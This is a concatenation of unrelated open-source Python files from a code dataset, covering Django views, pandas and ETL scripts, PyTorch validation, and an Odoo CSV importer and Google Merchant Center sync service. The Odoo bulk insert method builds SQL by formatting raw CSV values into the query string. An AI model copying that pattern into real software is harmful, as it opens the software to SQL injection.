        table_0 = pd.DataFrame(np.array(['A','B','C','D','E','F']).reshape(1,6),columns=['A','B','C','D','E','F'],index=np.array(['']))
        table_sol = pd.DataFrame(np.array([ [' '] for i in range(36)]).reshape(6,6).T,columns=['A','B','C','D','E','F'],index=np.array( [' ' for j in range(6) ]))
        l = [pd.DataFrame(np.array(self.l[i]).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6)) for i in range(len(self.l))]
        c = []
        for i in range(len(self.l)):
            c = c + [l[i]] + [table_sol] + [table_0]
        # BUGFIX: was `trash = c.pop` (missing parentheses), which bound the
        # method object instead of removing the trailing header row.
        c.pop()
        table = pd.concat(c)
        table.to_excel(self.name_q + '.xls')

    def printer_sol(self):
        """Write the solutions workbook: each exercise table followed by its
        filled answer grid and a column-header row."""
        table_0 = pd.DataFrame(np.array(['A','B','C','D','E','F']).reshape(1,6),columns=['A','B','C','D','E','F'],index=np.array(['']))
        table_sol = pd.DataFrame(np.array([ [' '] for i in range(36)]).reshape(6,6).T,columns=['A','B','C','D','E','F'],index=np.array( [' ' for j in range(6) ]))
        l = [pd.DataFrame(np.array(self.l[i]).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6)) for i in range(len(self.l))]
        s = [pd.DataFrame( np.concatenate([np.array(self.s[i]).reshape(6,5).T, np.array([[' ' for j in range(6)]])] ) ,columns=['A','B','C','D','E','F'],index=np.array( [' ' for k in range(6) ])) for i in range(len(self.s))]
        c = []
        for i in range(len(self.l)):
            c = c + [l[i]] + [s[i]] + [table_0]
        # BUGFIX: same missing-parentheses bug as printer_questions.
        c.pop()
        table = pd.concat(c)
        table.to_excel(self.name_s + '.xls')
# Guarded so importing this module does not generate 40 .xls files.
if __name__ == "__main__":
    for i in range(20):
        Sheet(i)
##for i in range(1):
## sheet(i)
##b = Block(1)
##l1 = b.list
##b = Block(2)
##l2 = b.list
##b = Block(3)
##l3 = b.list
##
##
##writer = pd.ExcelWriter('block.xls')
##
##
##table_0.to_excel(writer,sheet_name='sheet0')
##
##table_1 = pd.DataFrame(np.array(l1).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
##table_1.to_excel(writer,sheet_name='sheet1')
##
##table_2 = pd.DataFrame(np.array(l2).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
##table_2.to_excel(writer,sheet_name='sheet2')
##
##table_3 = pd.DataFrame(np.array(l3).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
##table_3.to_excel(writer,sheet_name='sheet3')
##writer.save()
##
##
##table_sol = pd.DataFrame(np.array([ [' '] for i in range(36)]).reshape(6,6).T,columns=['A','B','C','D','E','F'],index=np.array( [' ' for i in range(6) ]))
##
##pd.concat([table_1,table_sol,table_0,table_2,table_sol,table_0,table_3,table_sol]).to_excel('hola.xls')
## table_1 = pd.DataFrame(np.array(self.b1.list).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
## table_2 = pd.DataFrame(np.array(self.b2.list).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
## table_3 = pd.DataFrame(np.array(self.b3.list).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
## table_4 = pd.DataFrame(np.array(self.b4.list).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
## table_sol = pd.DataFrame(np.array([ [' '] for i in range(36)]).reshape(6,6).T,columns=['A','B','C','D','E','F'],index=np.array( [' ' for i in range(6) ]))
## pd.concat([table_1,table_sol,table_0,table_2,table_sol,table_0,table_3,table_sol,table_0,table_4,table_sol]).to_excel('hola.xls')
##
| tgquintela/educational-content | Computation exams/classes.py | classes.py | py | 7,360 | python | en | code | 0 | github-code | 50 |
17773861568 | from inspect import Attribute
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from . models import Sale
from . forms import SaleForm
from . utils import searchSales
# Create your views here.
@login_required(login_url='login')
def sales(request):
    """List all sales, filtered by the search query (if any)."""
    sales, search_query = searchSales(request)
    # totalamount = Sale.objects.get(volume=33)
    # totalamount.volume = (totalamount.price)*2
    # totalamount.save()
    context = {'sales':sales, 'search_query':search_query}
    return render(request, 'saletemplates/sales.html', context)
@login_required(login_url='login')
def sale(request, pk):
    """Show the detail page of a single sale.

    NOTE(review): Sale.objects.get raises DoesNotExist (HTTP 500) for an
    unknown pk — get_object_or_404 would return a 404 instead; confirm.
    """
    sale = Sale.objects.get(id=pk)
    context = {'sale':sale}
    return render(request, 'saletemplates/sale-details.html', context)
@login_required(login_url='login')
def addSale(request):
    """Render the add-sale form (GET) or create a sale and redirect (POST).

    An invalid POST falls through and re-renders the bound form so field
    errors are shown.
    """
    form = SaleForm()
    # initial_data = {
    #     'customer_name':'deleted',
    # }
    if request.method == 'POST':
        form = SaleForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('add-sale')
    # else:
    #     form=SaleForm(initial = initial_data)
    context = {'form':form}
    return render(request, 'saletemplates/add-sale-form.html', context)
| nguonodave/shell-POS-mgt-syst | sales/views.py | views.py | py | 1,277 | python | en | code | 0 | github-code | 50 |
72909929436 | # 将下载的CALIPSO数据按天分类,存放到相应的文件夹下
# CAL_LID_L2_01kmCLay-Standard-V4-20.2007-12-31T23-51-28ZN.hdf --> ./20071231/
# CAL_LID_L2_01kmCLay-Standard-V4-20.2008-01-01T00-37-48ZD.hdf --> ./20080101/
# ...
# CAL_LID_L2_01kmCLay-Standard-V4-20.2008-12-31T23-15-13ZD.hdf --> ./20081231/
import os
import shutil
import pandas as pd
# List the entry names directly inside a directory.
def get_files(root_path):  # on Windows, pass root_path as a raw string (r'...')
    '''
    Return the names of the entries directly under root_path.

    Note: os.listdir is NOT recursive — contrary to the original docstring's
    claim, files in subdirectories are not included.
    '''
    file_list = os.listdir(root_path)
    return file_list
# 按天查找文件名
def word_in_files(root_path, word):
    """Return the file names under *root_path* whose characters 35:45
    (the YYYY-MM-DD date field of a CALIPSO L2 file name) equal *word*."""
    return [name for name in get_files(root_path) if name[35:45] == word]
# 生成日期列表
def DAYlist(start, end):
    """Return every calendar day from *start* to *end* (inclusive) as a
    list of 'YYYY-MM-DD' strings."""
    days = pd.date_range(start, end, freq="D")
    return list(days.strftime("%Y-%m-%d"))
if __name__ == '__main__':
    # print(word_in_files('./','(1)'))
    days = DAYlist('2008-01-01','2008-12-31') # build the list of dates
    for daynum in days:
        files = word_in_files('F:/CALIPSO/2008', daynum)
        # target folder name YYYYMMDD, e.g. 2008-01-01 -> 20080101
        path = 'F:/CALIPSO/2008/' + daynum[0: 4]+daynum[5:7] + daynum[8:10]
        # print(path)
        if not os.path.exists(path): # create the per-day folder
            os.mkdir(path)
        for file in files:
            filepath = path + '/' + file # destination path for the move
            file = 'F:/CALIPSO/2008/' + file
            # print(filepath)
            shutil.move(file,filepath) # move the source file into the day folder
        # break
    pass
29593535843 | from typing import Dict, Tuple
import torch
from torch.utils.data import DataLoader
from model import NNModel
from utils import try_gpu
def valid(model: NNModel, test_loader: DataLoader) -> float:
    """Evaluate *model* on *test_loader* and return overall top-1 accuracy."""
    correct = 0
    total = 0
    model.eval()  # evaluation mode (disables dropout / BN updates)
    with torch.no_grad():
        for data in test_loader:
            images, labels = data
            images = try_gpu(images)
            labels = try_gpu(labels)
            # the model returns a 2-tuple; only the first element (the
            # class scores) is used here
            outputs, _ = model(images)
            _, predicted = torch.max(outputs.data, 1)
            total += labels.size(0)
            correct += (predicted == labels).sum().item()
    print(f"accuracy ({total} images): {correct/total}")
    return correct / total
def valid_each_class(model: NNModel, test_loader: DataLoader, class_names: Tuple[str]) -> Dict[str, float]:
    """Evaluate *model* per class and return {class_name: accuracy}."""
    correct_preds = {name: 0 for name in class_names}
    total_preds = {name: 0 for name in class_names}
    model.eval()  # evaluation mode (disables dropout / BN updates)
    with torch.no_grad():
        for data in test_loader:
            images, labels = data
            images = try_gpu(images)
            labels = try_gpu(labels)
            # the model returns a 2-tuple; only the class scores are used
            outputs, _ = model(images)
            _, predictions = torch.max(outputs.data, 1)
            # tally hits and totals per ground-truth class
            for label, prediction in zip(labels, predictions):
                if label == prediction:
                    correct_preds[class_names[label]] += 1
                total_preds[class_names[label]] += 1
    accuracies = {}
    for name, correct in correct_preds.items():
        total = total_preds[name]
        # NOTE(review): raises ZeroDivisionError for a class absent from the
        # loader — confirm every class appears in the test set.
        accuracy = float(correct) / total
        print(f"accuracy ({name}, {total} images): {accuracy}")
        accuracies[name] = accuracy
    return accuracies
| wararaki718/scrapbox4 | ml_sample/sample_influence_balanced_loss/valid.py | valid.py | py | 1,683 | python | en | code | 0 | github-code | 50 |
22058821747 | #Brandon Jones
#2/26/19
#Jones_M3P1
#This program will find the highest,lowest,average,and total of a set of data
def main():
    """Read how many numbers to collect, collect them, then print the list
    plus its highest, lowest, total, and average."""
    num = int(input("Enter how many numbers you would like to enter: "))
    # guard: avoid ZeroDivisionError / max() on an empty list
    if num <= 0:
        print("Nothing to report for an empty list.")
        return
    # build the list directly instead of pre-filling [0]*num and indexing
    my_list = [int(input("Enter a value: ")) for _ in range(num)]
    ave = sum(my_list) / num
    print(my_list)
    print(max(my_list), "is the highest number")
    print(min(my_list), "is the lowest number")
    print(sum(my_list), "is the total of the list")
    print(ave, "is the average of the list")


# Guarded so importing this module does not prompt for input.
if __name__ == "__main__":
    main()
| Jonesb5977/csc121 | Jones_M3P1.py | Jones_M3P1.py | py | 595 | python | en | code | 0 | github-code | 50 |
10670365119 | import numpy as np
import subprocess
all_iterations = []
batch_sizes = [1, 2, 3, 4, 5, 8, 10, 15, 20, 25, 50]
for j in batch_sizes:
iterations = []
for i in range(0, 100):
command = "./planner.sh --algorithm bspi --mdp data/MDP50_%d.txt --batchsize %d" % (i, j)
it = int(subprocess.check_output(command, shell=True))
print("File %d, Size %d - %d iterations" % (i, j, it))
iterations.append(it)
print("Mean (Size %d) - %.6f" % (j, np.mean(iterations)))
print("Std (Size %d) - %.6f" % (j, np.std(iterations)))
| martiansideofthemoon/cs747-assignments | assign2/run_bspi.py | run_bspi.py | py | 559 | python | en | code | 0 | github-code | 50 |
71061066074 | import base64
import csv
import io
from odoo import api, models, fields
import xmlrpc.client
class ImportCsvEstatePropertyWizard(models.TransientModel):
    """Transient wizard that loads estate.property records from a CSV file."""
    _name = "import.csv.estate.property.wizard"
    _description = "Wizard to load Properties from CSV"

    # the uploaded file (base64-encoded binary) is stored here:
    csv_file = fields.Binary(string='CSV File', required=True)
    #property_ids = fields.Many2one("estate.property", string="Name", default=lambda self: self.env['estate.property'].search([]))

    def import_csv(self):
        """Decode the uploaded CSV, normalize the header row (lowercase,
        spaces -> underscores) and create the records via the ORM."""
        csv_data = base64.b64decode(self.csv_file)
        data_file = io.StringIO(csv_data.decode("utf-8"))
        data_file.seek(0)
        file_reader = []
        # NOTE(review): csv_dict is created but never used — confirm it can go
        csv_dict = csv.DictReader(data_file, delimiter=',')
        csv_reader = csv.reader(data_file, delimiter=',')
        file_reader.extend(csv_reader)
        # normalize header names to ORM field names
        file_reader[0] = [x.lower() for x in file_reader[0] ]
        file_reader[0] = [x.replace(" ", "_") for x in file_reader[0] ]
        #reader = csv.DictReader(base64.b64decode(self.csv_file).split('\n'))
        #reader = csv.DictReader(base64.b64decode(self.csv_file).decode('file_encoding').encode('utf-8').split('\n')) #For files with different encoding
        return self.bulk_create_estate_property(file_reader)

    def bulk_insert_estate_property(self, csv_reader):
        """Build and run a single raw INSERT for all CSV rows.

        WARNING(security): the query is assembled by string formatting of
        raw CSV values — vulnerable to SQL injection and quoting breakage.
        Prefer parameterized queries or the ORM path (bulk_create_...).
        """
        insert_query = ""
        i = 0
        for row in csv_reader:
            i += 1
            if i < 2:
                # first row: build the column list from the header
                header = ','.join(row)
                header = header.lower()
                header = header.replace(" ", "_")
                insert_query = "INSERT INTO {}({}) VALUES ".format('estate_property', header)
            else:
                row_values = str("({}), ".format(row))
                row_values = row_values.replace("[", "")
                row_values = row_values.replace("]", "")
                insert_query += row_values
        insert_query = insert_query[:-2] # drop the trailing comma+space
        try:
            self._cr.execute(insert_query)
            self._cr.commit()
        except Exception as ex:
            print(ex)
            return False
        return True

    def bulk_create_estate_property(self, list_reader):
        """Create one estate.property per CSV data row via the ORM
        (header row supplies the field names)."""
        headers, values = list_reader[0], list_reader[1:]
        dictionary_of_properties = [dict(zip(headers, value)) for value in values]
        for entry in dictionary_of_properties:
            self.env['estate.property'].create(entry)
        """
        url, db, username, password = 'https://localhost:8069', 'odoo_tesis_db1', 'a20160500', 'test'
        common = xmlrpc.client.ServerProxy('{}/xmlrpc/2/common'.format(url))
        uid = common.authenticate(db, username, password, {}) #authentication
        if uid:
            print("authentication succeeded")
            models = xmlrpc.client.ServerProxy('{}/xmlrpc/2/object'.format(url))
            property_types = models.execute_kw(db, uid, password, 'estate.property.type', 'read', [list(range(1,100))], {'fields': ['name']})
            for row in csv_reader:
                print("---row---: ", row)
            print("Property Types from BD")
            print(property_types)
        else:
            print("authentication failed")
        """
35855005883 | nomes = []
def menor_nome(list):
"""
-> Função devolve o menor mome escrito
param: lista de nomes
"""
menor = cont = 0
for i in list:
a = len(i)
if cont == 0:
menor = a
nome_m = i.capitalize()
if a < menor:
menor = a
nome_m = i.capitalize()
cont +=1
print(nome_m)
return menor, nome_m
'''while True:
resp = 'S'
nom = str(input('Digite um nome: ')).strip().upper()
resp = str(input('Quer continuar? [S/N]:')).upper()[0]
nomes.append(nom.strip())
if resp == 'N':
break'''
#nomes =['ana','joao','aninha','Pedro','joni']
#men = menor_nome(['maria', 'josé', 'PAULO', 'Catarina'])
menor_nome(['maria', 'josé', 'PAULO', 'Catarina'])
#print(menor_nome(nome_m))
'''print('-+-'*10)
print(f'O menor nome da lista é = {men[1]}')
print('-+-'*10)
'''
| SricardoSdSouza/Curso-da-USP | Coursera 2/exercicios da aula/str_menor.py | str_menor.py | py | 890 | python | pt | code | 0 | github-code | 50 |
21001568320 | import pandas as pd
import re
from datetime import datetime
import os
import logging
def transform_data(data):
    """Clean and derive columns of a scraped iCarros listings DataFrame.

    Expects the columns 'model_brand', 'price', 'year_km_color_cambio' and
    'advertiser'.  Derives brand/model/motor, price, year, location, km,
    color, transmission and advertiser_description, converts price/km to
    float, stamps the scrape date, and returns the mutated DataFrame.
    """
    # -- Logging
    # NOTE(review): hard-coded absolute Windows path — breaks on any other
    # machine; consider deriving it from __file__ or configuration.
    path = 'C:/Users/Jhonatans/projects/ETL/Etl-Car-Recommendation/'
    if not os.path.exists(path + 'logs'):
        os.makedirs(path + 'logs')
    logging.basicConfig(
        filename= path + 'logs/etl_icarros.txt',
        level = logging.DEBUG,
        format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s -',
        datefmt= '%Y-%m-%d %H:%M:%S'
    )
    logger = logging.getLogger('etl_icarros')
    # accumulators for the derived per-row values
    car_engine = []
    km = []
    color = []
    transmission = []
    description = []
    # model_brand: first token is the brand, second the model
    data['brand'] = data['model_brand'].apply(lambda x: x.split(' ')[0].strip('\n').lower())
    data['model'] = data['model_brand'].apply(lambda x: x.split(' ')[1].strip('\n').lower())
    for text in data['model_brand']:
        position = text.find(' ')
        text_procured = text[position:]
        try:
            # engine size looks like "1.0", "2.0", ... after the brand
            car_engine.append(re.search('(\d.\d)', text_procured).group(1).lower())
        except AttributeError:
            # no match -> re.search returned None
            car_engine.append('')
    # Motor
    data['motor'] = car_engine
    # NOTE(review): this replace chain patches specific mis-parsed engine
    # strings ('0 1' -> '1.0', '250' -> '2.5', ...) — fragile; verify against
    # fresh scrapes before extending.
    data['motor'] = data['motor'].apply(lambda x: 'uninformed' if x == '' else x.replace('0 1', '1.0').replace('2 1', '2.0').replace('250', '2.5').replace('5 2', '5.2').replace('230', '2.3').replace('208', '2.0'))
    # price: drop the currency token and the 'preço' label
    data['price'] = data['price'].apply(lambda x: x.split(' ')[1].replace('preço', ''))
    # year_km_color_cambio: leading digits of the first token are the year
    data['year'] = data['year_km_color_cambio'].apply(lambda x: re.search('(\d+)', x.split(' ')[0].strip()).group(1))
    # advertiser: line 1 = district, line 2 = city; state is fixed to SP
    data['district'] = data['advertiser'].apply(lambda x: x.strip().replace('\n\n', '\n').split('\n')[0].lower())
    data['city'] = data['advertiser'].apply(lambda x: x.strip().replace('\n\n', '\n').split('\n')[1].lower())
    data['state'] = 'sp'
    for i in data['year_km_color_cambio']:
        # the text between the last 'Km' and the last 'Cor' is the mileage
        position_km = i.rfind('Km')
        position_color = i.rfind('Cor')
        km.append(i[position_km:position_color].replace(' ', '').replace('\n', '').replace('Km', ''))
        color.append(i[position_color:].replace('\n', ' ').split(' ')[0].lower())
        try:
            transmission.append(i[position_color:].replace('\n', ' ').split(' ')[1].lower())
        except IndexError:
            # transmission token missing — infer it from an "auto..." match
            regex = bool(re.search('auto\w.\w+', i))
            if regex == True:
                transmission.append('automático')
            else:
                transmission.append('manual')
        try:
            description.append(i[position_color:].replace('\n', ' ').split(' ')[2].lower())
        except IndexError:
            description.append(i[position_color:].replace('\n', ' '))
    data['km'] = km
    data['color'] = color
    data['transmission'] = transmission
    data['advertiser_description'] = description
    logger.info('Dados derivados OK')
    # Clean color and transmission (strip the Portuguese field labels)
    data['color'] = data['color'].apply(lambda x: x.replace('cor ', ''))
    data['transmission'] = data['transmission'].apply(lambda x: x.replace('câmbio ', ''))
    # Drop the raw source columns
    data.drop(columns=['model_brand', 'advertiser', 'year_km_color_cambio'], inplace=True)
    # -- Change type (Brazilian number format: '.' thousands, ',' decimals)
    data['price'] = data['price'].apply(lambda x: x.replace('.', '').replace(',', '.')).astype('float')
    # NOTE(review): truncating km strings longer than 8 chars to 6 looks like
    # a workaround for concatenated values — confirm against the raw data.
    data['km'] = data['km'].apply(lambda x: x[:6] if len(x) > 8 else x).astype('float')
    logger.info('Mudanca de tipos OK')
    # stamp when this row was scraped/transformed
    date_now = datetime.now().strftime('%Y-%m-%d')
    data['scrapy_date'] = date_now
    return data
28324708686 | # -*- coding: utf-8 -*-
from odoo import api, fields, models, _
from odoo.exceptions import UserError, RedirectWarning
import time
import json
import requests
from werkzeug import urls
import logging
_logger = logging.getLogger(__name__)
TIMEOUT = 20
GOOGLE_AUTH_ENDPOINT = 'https://accounts.google.com/o/oauth2/auth'
GOOGLE_TOKEN_ENDPOINT = 'https://accounts.google.com/o/oauth2/token'
GOOGLE_API_BASE_URL = 'https://www.googleapis.com'
unique_id_increment = 0
def get_unique_id():
    """Generate a unique ID string.

    Combines the current UNIX timestamp with a per-process counter so two
    calls within the same second still differ.

    Returns:
        A unique string of the form "<timestamp><counter>".
    """
    global unique_id_increment
    # Defensive re-initialisation in case the module-level counter was reset.
    if unique_id_increment is None:
        unique_id_increment = 0
    unique_id_increment += 1
    return f"{int(time.time())}{unique_id_increment}"
class GoogleMerchantCenterService(models.Model):
    """Service model that pushes Odoo products to Google Merchant Center
    via the Content API for Shopping (v2.1).

    Handles the OAuth2 token exchange and the create/update/delete calls
    for product listings.
    """
    _name = 'google.merchant.center.service'
    _description = "GMC Service"
    # Adapted from the google_account module, but this module's own
    # /google_content/authentication controller is used as redirect URI.
    @api.model
    def _get_google_token_uri(self, service, scope):
        """Return the Google OAuth2 authorization URL for *service* / *scope*."""
        get_param = self.env['ir.config_parameter'].sudo().get_param
        web_base_url = get_param("web.base.url")
        encoded_params = urls.url_encode({
            'scope': scope,
            'redirect_uri': web_base_url + '/google_content/authentication',
            'client_id': get_param('google_%s_client_id' % service),
            'response_type': 'code',
        })
        return '%s?%s' % (GOOGLE_AUTH_ENDPOINT, encoded_params)
    # Adapted from the google_account module; returns the access_token
    # field of the response instead of the refresh token.
    @api.model
    def generate_refresh_token(self, service, authorization_code):
        """Exchange *authorization_code* against a token at Google.

        :param service: name of the google service (used to look up the
            configured client id/secret)
        :param authorization_code: code returned by the OAuth consent screen
        :returns: the access token from Google's response (despite the
            method name, the 'access_token' field is returned)
        """
        Parameters = self.env['ir.config_parameter'].sudo()
        client_id = Parameters.get_param('google_%s_client_id' % service)
        client_secret = Parameters.get_param('google_%s_client_secret' % service)
        # NOTE(review): the configured 'google_redirect_uri' is fetched but
        # immediately overwritten by the controller URL two lines below.
        redirect_uri = Parameters.get_param('google_redirect_uri')
        web_base_url = Parameters.get_param("web.base.url")
        redirect_uri = web_base_url + '/google_content/authentication'
        # Exchange the authorization code at Google's token endpoint.
        headers = {"Content-type": "application/x-www-form-urlencoded"}
        data = {
            'code': authorization_code,
            'client_id': client_id,
            'client_secret': client_secret,
            'redirect_uri': redirect_uri,
            'grant_type': "authorization_code"
        }
        try:
            req = requests.post(GOOGLE_TOKEN_ENDPOINT, data=data, headers=headers, timeout=TIMEOUT)
            req.raise_for_status()
            content = req.json()
        except IOError:
            error_msg = _("Something went wrong during your token generation. Maybe your Authorization Code is invalid or already expired")
            raise self.env['res.config.settings'].get_config_warning(error_msg)
        return content.get('access_token')
    # Adapted from the google_account module.
    @api.model
    def get_access_token(self, scope=None):
        """Return a fresh access token using the stored refresh token.

        :param scope: OAuth scope, defaults to the Content API scope
        :raises UserError/RedirectWarning: when the API is not configured
            or the refresh request fails
        """
        Config = self.env['ir.config_parameter'].sudo()
        google_content_refresh_token = Config.get_param('google_content_refresh_token')
        user_is_admin = self.env.is_admin()
        if not google_content_refresh_token:
            raise UserError(_("Google Shopping API is not yet configured. Please contact your administrator."))
        google_content_client_id = Config.get_param('google_content_client_id')
        google_content_client_secret = Config.get_param('google_content_client_secret')
        # Trade the stored refresh token for a new short-lived access token.
        data = {
            'client_id': google_content_client_id,
            'refresh_token': google_content_refresh_token,
            'client_secret': google_content_client_secret,
            'grant_type': "refresh_token",
            'scope': scope or 'https://www.googleapis.com/auth/content'
        }
        headers = {"Content-type": "application/x-www-form-urlencoded"}
        try:
            req = requests.post(GOOGLE_TOKEN_ENDPOINT, data=data, headers=headers, timeout=TIMEOUT)
            req.raise_for_status()
        except requests.HTTPError:
            # Admins are redirected to the settings panel; other users just
            # get an error message.
            if user_is_admin:
                dummy, action_id = self.env['ir.model.data'].get_object_reference('base_setup', 'action_general_configuration')
                msg = _("Something went wrong during the token generation. Please request again an authorization code .")
                raise RedirectWarning(msg, action_id, _('Go to the configuration panel'))
            else:
                raise UserError(_("Google Shopping API is not yet configured. Please contact your administrator."))
        return req.json().get('access_token')
    def sync_product_with_gmc(self, products):
        """Create or update the given products on Google Merchant Center.

        Products that already carry a ``google_mcid`` are PATCHed; others are
        POSTed (inserted) and receive a freshly generated offer id.

        :param products: product.product recordset to push
        """
        def get_names(cat):
            """ Return the list [cat.name, cat.parent_id.name, ...] """
            res = []
            while cat:
                res.append(cat.name)
                cat = cat.parent_id
            return res
        currency = self.env.user.company_id.currency_id.name
        # NOTE(review): 'count' is never used below.
        count = 1
        for product in products:
            # Reuse the stored display-ads id or generate and persist one.
            if product.google_display_ads_id:
                displayAdsId = product.google_display_ads_id
            else:
                displayAdsId = 'ADS%s' % get_unique_id()
                product.write({'google_display_ads_id': displayAdsId})
            product_data = {
                'displayAdsId': displayAdsId,
                'title': product.name,
                'description': product.description_sale,
                # Use the product template url as variants are not shown separately.
                'link': product.google_merchant_center_id.website + "/shop/product/%s" % (product.product_tmpl_id.id,),
                'imageLink': product.google_merchant_center_id.website + '/web/image/%s/%s/%s/image.jpg' % ('product.template', product.product_tmpl_id.id, 'image_1024'),
                # Note: backend image URL is used (not the website one) because
                # the store does not accept images without a content type.
                'contentLanguage': product.google_content_language,
                'targetCountry': product.google_target_country,
                'channel': product.google_channel,
                'availability': product.google_availability,
                'condition': product.google_condition,
                'googleProductCategory': " > ".join(reversed(get_names(product.google_product_category_id))),
                'productTypes': [" > ".join(reversed(get_names(product.categ_id)))],
                'brand': product.google_product_brand_id and product.google_product_brand_id.name or '',
                'price': {
                    'value': product.gmc_list_price,
                    'currency': currency},
                'shipping': [{
                    'country': product.google_target_country,
                    'service': product.google_shipping,
                    'price': {'value': product.google_shipping_amount,
                    'currency': currency}
                }],
                'shippingWeight': {
                    'value': product.weight * 1000,
                    'unit': 'grams'
                },
            }
            if product.google_mcid:
                # These identifier parts are immutable on update (they are
                # encoded in the REST product id instead).
                product_data.pop('targetCountry')
                product_data.pop('contentLanguage')
                product_data.pop('channel')
            else:
                offerId = 'CM%s' % get_unique_id()
                product_data.update({'offerId': offerId, 'id': offerId})
            # Only add gtin/mpn when identifierExists is set; otherwise
            # explicitly tell Google there is no identifier.
            if product.google_identifier_exists:
                if not product.google_barcode_as_gtin and product.google_gtin:
                    product_data.update({'gtin': product.google_gtin})
                elif product.google_barcode_as_gtin and product.barcode:
                    product_data.update({'gtin': product.barcode})
                if product.google_default_code_as_mpn:
                    product_data.update({'mpn': product.default_code})
            else:
                product_data.update({'identifier_exists': 'no'})
            # Optional attributes.
            if product.google_gender:
                product_data.update({'gender': product.google_gender})
            if product.google_age_group:
                product_data.update({'ageGroup': product.google_age_group})
            if product.google_product_size_id:
                product_data.update({'sizes': [product.google_product_size_id and product.google_product_size_id.name or '']})
            if product.google_product_color_id:
                product_data.update({'color': product.google_product_color_id and product.google_product_color_id.name or '',})
            if product.google_expiration_date:
                # Google expects ISO-formatted dates.
                expiration_date = product.google_expiration_date.strftime('%Y-%m-%d')
                product_data.update({'expirationDate': expiration_date})
            # Optional attributes for remarketing.
            if product.google_display_ads_similar_ids:
                product_data.update({'displayAdsSimilarIds': [prod.google_display_ads_id for prod in product.google_display_ads_similar_ids]})
            if product.google_display_ads_title:
                product_data.update({'displayAdsTitle': product.google_display_ads_title})
            if product.google_display_ads_link:
                product_data.update({'displayAdsLink': product.google_display_ads_link})
            if product.google_display_ads_value:
                product_data.update({'displayAdsValue': product.google_display_ads_value})
            if product.google_excluded_destination:
                # NOTE(review): the Content API documents 'destinations' as a
                # list of objects; a single dict is sent here — confirm.
                product_data.update({'destinations': {
                    'destinationName': 'DisplayAds',
                    'intention': 'excluded'}
                })
            token = self.get_access_token()
            jason_data_set = json.dumps(product_data)
            if product.google_mcid:
                # REST id format: channel:contentLanguage:targetCountry:offerId
                mc_product_id = product.google_channel + ':' + product.google_content_language + ':' + product.google_target_country+ ':' + product.google_mcid
                url = "https://shoppingcontent.googleapis.com/content/v2.1/%s/products/%s" % (product.google_merchant_center_id.name, mc_product_id)
                reqreply = requests.patch(url, jason_data_set, headers={'accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % (token)})
            else:
                url = "https://shoppingcontent.googleapis.com/content/v2.1/%s/products" % product.google_merchant_center_id.name
                reqreply = requests.post(url, jason_data_set, headers={'accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % (token)})
            # NOTE(review): 'reqreply_text' is unused, and json.loads() will
            # raise if Google returns a non-JSON body; the error branch below
            # also parses the body a second time.
            reqreply_text = json.loads(reqreply.text)
            if reqreply.status_code!=200:
                # Field name keeps the historical spelling 'gmc_lisitng_response'.
                product.gmc_lisitng_response = json.loads(reqreply.text)
            if reqreply.status_code==200:
                if product.google_mcid:
                    product.write({'google_sync_date': fields.Date.today()})
                else:
                    product.write({'google_mcid': offerId, 'google_sync_date': fields.Date.today()})
    def sync_products_with_gmc(self) :
        """Push products that are flagged for sync but not yet on the center."""
        products = self.env['product.product'].search([('sync_with_mc','=',True), ('website_published','=',True), ('google_product_brand_id','!=',False), ('google_merchant_center_id','!=',False),('google_mcid','=',False)])
        _logger.info('Total products to be synced------ %s', len(products))
        self.sync_product_with_gmc(products)
    def re_sync_products_with_gmc(self) :
        """Re-push all already-synced products, oldest sync date first."""
        products = self.env['product.product'].search([('sync_with_mc','=',True), ('google_mcid','!=',False)], order='google_sync_date asc')
        _logger.info('Total products to be synced------ %s', len(products))
        self.sync_product_with_gmc(products)
    def delete_product_from_gmc(self, products):
        """Delete the given products from Google Merchant Center.

        Clears ``google_mcid`` on success; stores the error body on failure.

        :param products: product.product recordset to delete remotely
        """
        for product in products:
            if product.google_mcid:
                mc_product_id = product.google_channel + ':' + product.google_content_language + ':' + product.google_target_country+ ':' + product.google_mcid
                token = self.get_access_token()
                _logger.info('Product------- %s',product)
                url = "https://shoppingcontent.googleapis.com/content/v2.1/%s/products/%s" % (product.google_merchant_center_id.name, mc_product_id)
                reqreply = requests.delete(url, headers={'accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': 'Bearer %s' % (token)})
                if reqreply.status_code==200:
                    product.google_mcid = ''
                    # Commit per product so partial progress survives a crash.
                    self.env.cr.commit()
                if reqreply.status_code!=200:
                    try:
                        product.gmc_lisitng_response = json.loads(reqreply.text)
                    except:
                        pass
    def delete_products_from_gmc(self) :
        """Delete every synced product from Google Merchant Center."""
        products = self.env['product.product'].search([('sync_with_mc','=',True), ('google_mcid','!=',False)])
        self.delete_product_from_gmc(products)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | pman-jvm/totaltools-v15 | website_google_merchant_center/models/google_merchant_center.py | google_merchant_center.py | py | 14,207 | python | en | code | 0 | github-code | 50 |
14268944897 | from django.urls import path
from api.views.film import FilmRetrieveUpdateAPIView, FilmListAPIView
app_name = 'film'
urlpatterns = [
path('<int:id>/', FilmRetrieveUpdateAPIView.as_view(), name='film-detail'),
path('list/', FilmListAPIView.as_view(), name='film-list')
]
| Eugen1y/Cinema | api/urls/film.py | film.py | py | 282 | python | en | code | 0 | github-code | 50 |
9642440681 | from pathlib import Path
import setuptools
# Use the README as the PyPI long description.
this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text()
setuptools.setup(
    name="streamlit-camera-input-live",
    version="0.2.0",
    author="Zachary Blackwood",
    author_email="zachary@streamlit.io",
    description="Alternative version of st.camera_input which returns the webcam images live, without any button press needed",
    long_description=long_description,
